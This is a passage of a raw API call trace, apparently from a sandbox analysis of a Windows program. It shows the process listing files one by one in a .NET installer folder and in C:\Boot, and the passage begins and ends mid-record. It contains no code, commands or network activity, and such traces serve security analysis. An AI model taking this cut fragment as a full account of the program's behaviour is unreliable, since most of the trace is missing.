ftLastWriteTime.dwLowDateTime=0x5b5e7f00, ftLastWriteTime.dwHighDateTime=0x1ca927c, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x0, dwReserved1=0x0, cFileName="stop.ico", cAlternateFileName="")) returned 1 [0169.266] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SysReqMet.ico", cAlternateFileName="SYSREQ~1.ICO")) returned 1 [0169.267] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SysReqNotMet.ico", cAlternateFileName="SYSREQ~2.ICO")) returned 1 [0169.267] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x0, dwReserved1=0x0, cFileName="warn.ico", cAlternateFileName="")) returned 1 [0169.267] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x0, dwReserved1=0x0, cFileName="warn.ico", cAlternateFileName="")) returned 0 [0169.267] FindClose (in: hFindFile=0x802458 | out: hFindFile=0x802458) returned 1 [0169.268] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.268] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x87910600, ftLastWriteTime.dwHighDateTime=0x1ca2a27, nFileSizeHigh=0x0, nFileSizeLow=0xe2c, dwReserved0=0x0, dwReserved1=0x240000, cFileName="header.bmp", cAlternateFileName="")) returned 1 [0169.268] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x66ea7e00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0x66ea7e00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0x66ea7e00, ftLastWriteTime.dwHighDateTime=0x1cac6e3, nFileSizeHigh=0x0, nFileSizeLow=0xad1384b, dwReserved0=0x0, dwReserved1=0x240000, cFileName="netfx_Core.mzz", cAlternateFileName="NETFX_~1.MZZ")) returned 1 [0169.268] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xc183da00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0xc183da00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0xc183da00, ftLastWriteTime.dwHighDateTime=0x1cac6e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d0200, dwReserved0=0x0, dwReserved1=0x240000, cFileName="netfx_Core_x64.msi", cAlternateFileName="NETFX_~1.MSI")) returned 1 [0169.269] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4c130c00, ftCreationTime.dwHighDateTime=0x1cac6d9, ftLastAccessTime.dwLowDateTime=0x4c130c00, ftLastAccessTime.dwHighDateTime=0x1cac6d9, ftLastWriteTime.dwLowDateTime=0x4c130c00, ftLastWriteTime.dwHighDateTime=0x1cac6d9, nFileSizeHigh=0x0, nFileSizeLow=0x11c000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="netfx_Core_x86.msi", cAlternateFileName="NETFX_~2.MSI")) returned 1 [0169.269] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf74cd515, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf74cd515, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf7cd9415, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x29222c7, dwReserved0=0x0, dwReserved1=0x240000, cFileName="netfx_Extended.mzz", cAlternateFileName="NETFX_~2.MZZ")) returned 1 [0169.269] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2dbe0800, ftCreationTime.dwHighDateTime=0x1cac6fb, ftLastAccessTime.dwLowDateTime=0x2dbe0800, ftLastAccessTime.dwHighDateTime=0x1cac6fb, ftLastWriteTime.dwLowDateTime=0x2dbe0800, ftLastWriteTime.dwHighDateTime=0x1cac6fb, nFileSizeHigh=0x0, nFileSizeLow=0xd5000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="netfx_Extended_x64.msi", cAlternateFileName="NETFX_~3.MSI")) returned 1 [0169.269] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7626f700, ftCreationTime.dwHighDateTime=0x1cac6f6, ftLastAccessTime.dwLowDateTime=0x7626f700, ftLastAccessTime.dwHighDateTime=0x1cac6f6, ftLastWriteTime.dwLowDateTime=0x7626f700, ftLastWriteTime.dwHighDateTime=0x1cac6f6, nFileSizeHigh=0x0, nFileSizeLow=0x79000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="netfx_Extended_x86.msi", cAlternateFileName="NETFX_~4.MSI")) returned 1 [0169.271] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4a0f7400, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x4a0f7400, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x4a0f7400, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x426ae, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ParameterInfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0169.271] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x19dedd00, ftCreationTime.dwHighDateTime=0x1ca2a1b, ftLastAccessTime.dwLowDateTime=0x19dedd00, ftLastAccessTime.dwHighDateTime=0x1ca2a1b, ftLastWriteTime.dwLowDateTime=0x19dedd00, ftLastWriteTime.dwHighDateTime=0x1ca2a1b, nFileSizeHigh=0x0, nFileSizeLow=0x2d200, dwReserved0=0x0, dwReserved1=0x240000, cFileName="RGB9RAST_x64.msi", cAlternateFileName="RGB9RA~1.MSI")) returned 1 [0169.271] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x177c8300, ftCreationTime.dwHighDateTime=0x1ca2a1b, ftLastAccessTime.dwLowDateTime=0x177c8300, ftLastAccessTime.dwHighDateTime=0x1ca2a1b, ftLastWriteTime.dwLowDateTime=0x177c8300, ftLastWriteTime.dwHighDateTime=0x1ca2a1b, nFileSizeHigh=0x0, nFileSizeLow=0x17200, dwReserved0=0x0, dwReserved1=0x240000, cFileName="RGB9Rast_x86.msi", cAlternateFileName="RGB9RA~2.MSI")) returned 1 [0169.272] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x13148, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Setup.exe", cAlternateFileName="")) returned 1 [0169.272] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0xc5158, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SetupEngine.dll", cAlternateFileName="SETUPE~1.DLL")) returned 1 [0169.272] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x48150, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SetupUi.dll", cAlternateFileName="")) returned 1 [0169.272] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5381000, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x5381000, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x5381000, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x75a8, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SetupUi.xsd", cAlternateFileName="")) returned 1 [0169.272] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x6519be00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0x6519be00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0x6519be00, ftLastWriteTime.dwHighDateTime=0x1cac6d5, nFileSizeHigh=0x0, nFileSizeLow=0x17758, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SetupUtility.exe", cAlternateFileName="SETUPU~1.EXE")) returned 1 [0169.272] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0xa078, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SplashScreen.bmp", cAlternateFileName="SPLASH~1.BMP")) returned 1 [0169.273] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x143bc400, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0x143bc400, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0x143bc400, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x23420, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0169.273] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x3704, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Strings.xml", cAlternateFileName="")) returned 1 [0169.273] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x97f2, dwReserved0=0x0, dwReserved1=0x240000, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0169.273] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x87910600, ftLastWriteTime.dwHighDateTime=0x1ca2a27, nFileSizeHigh=0x0, nFileSizeLow=0x19688, dwReserved0=0x0, dwReserved1=0x240000, cFileName="watermark.bmp", cAlternateFileName="WATERM~1.BMP")) returned 1 [0169.273] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2120bc00, ftCreationTime.dwHighDateTime=0x1cac6c9, ftLastAccessTime.dwLowDateTime=0x2120bc00, ftLastAccessTime.dwHighDateTime=0x1cac6c9, ftLastWriteTime.dwLowDateTime=0x2120bc00, ftLastWriteTime.dwHighDateTime=0x1cac6c9, nFileSizeHigh=0x0, nFileSizeLow=0x4f5113, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Windows6.0-KB956250-v6001-x64.msu", cAlternateFileName="WINDOW~1.MSU")) returned 1 [0169.273] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1bbe7400, ftCreationTime.dwHighDateTime=0x1cac6bf, ftLastAccessTime.dwLowDateTime=0x1bbe7400, ftLastAccessTime.dwHighDateTime=0x1cac6bf, ftLastWriteTime.dwLowDateTime=0x1bbe7400, ftLastWriteTime.dwHighDateTime=0x1cac6bf, nFileSizeHigh=0x0, nFileSizeLow=0x217520, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Windows6.0-KB956250-v6001-x86.msu", cAlternateFileName="WINDOW~2.MSU")) returned 1 [0169.274] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8e5700, ftCreationTime.dwHighDateTime=0x1cac6d1, ftLastAccessTime.dwLowDateTime=0x5b8e5700, ftLastAccessTime.dwHighDateTime=0x1cac6d1, ftLastWriteTime.dwLowDateTime=0x5b8e5700, ftLastWriteTime.dwHighDateTime=0x1cac6d1, nFileSizeHigh=0x0, nFileSizeLow=0x4db1ce, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Windows6.1-KB958488-v6001-x64.msu", cAlternateFileName="WINDOW~3.MSU")) returned 1 [0169.274] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0xd0ac5d00, ftLastWriteTime.dwHighDateTime=0x1cac6ce, nFileSizeHigh=0x0, nFileSizeLow=0x20acf9, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Windows6.1-KB958488-v6001-x86.msu", cAlternateFileName="WINDOW~4.MSU")) returned 1 [0169.274] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0xd0ac5d00, ftLastWriteTime.dwHighDateTime=0x1cac6ce, nFileSizeHigh=0x0, nFileSizeLow=0x20acf9, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Windows6.1-KB958488-v6001-x86.msu", cAlternateFileName="WINDOW~4.MSU")) returned 0 [0169.276] FindClose (in: hFindFile=0x8025d8 | out: hFindFile=0x8025d8) returned 1 [0169.276] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x31f0050 | out: hHeap=0x710000) returned 1 [0169.285] FindNextFileW (in: hFindFile=0x729758, lpFindFileData=0x2d6fcf8 | out: lpFindFileData=0x2d6fcf8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6fa258, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77970000, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0169.286] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x31f0050 [0169.286] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9d311c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef9d311c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x802298 [0169.287] FindNextFileW (in: hFindFile=0x802298, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9d311c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef9d311c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0169.290] FindNextFileW (in: hFindFile=0x802298, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x6d72d3cf, ftLastAccessTime.dwHighDateTime=0x1d5e877, ftLastWriteTime.dwLowDateTime=0x6d72d3cf, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0xb000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BCD", cAlternateFileName="")) returned 1 [0169.294] FindNextFileW (in: hFindFile=0x802298, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0169.295] FindNextFileW (in: hFindFile=0x802298, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0169.295] FindNextFileW (in: hFindFile=0x802298, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0169.295] FindNextFileW (in: hFindFile=0x802298, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc47bb525, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0169.295] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.296] FindFirstFileW (in: lpFileName="C:\\Boot\\bg-BG\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc47bb525, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802118 [0169.296] FindNextFileW (in: hFindFile=0x802118, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc47bb525, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.296] FindNextFileW (in: hFindFile=0x802118, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0169.296] FindNextFileW (in: hFindFile=0x802118, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0169.296] FindClose (in: hFindFile=0x802118 | out: hFindFile=0x802118) returned 1 [0169.297] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.297] FindNextFileW (in: hFindFile=0x802298, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef4e6d79, ftCreationTime.dwHighDateTime=0x1d3273d, ftLastAccessTime.dwLowDateTime=0xef4e6d79, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x175a0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="bootspaces.dll", cAlternateFileName="BOOTSP~1.DLL")) returned 1 [0169.297] FindNextFileW (in: hFindFile=0x802298, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xef703e94, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0169.297] FindNextFileW (in: hFindFile=0x802298, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef4fcd12, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x185a0, dwReserved0=0x0, 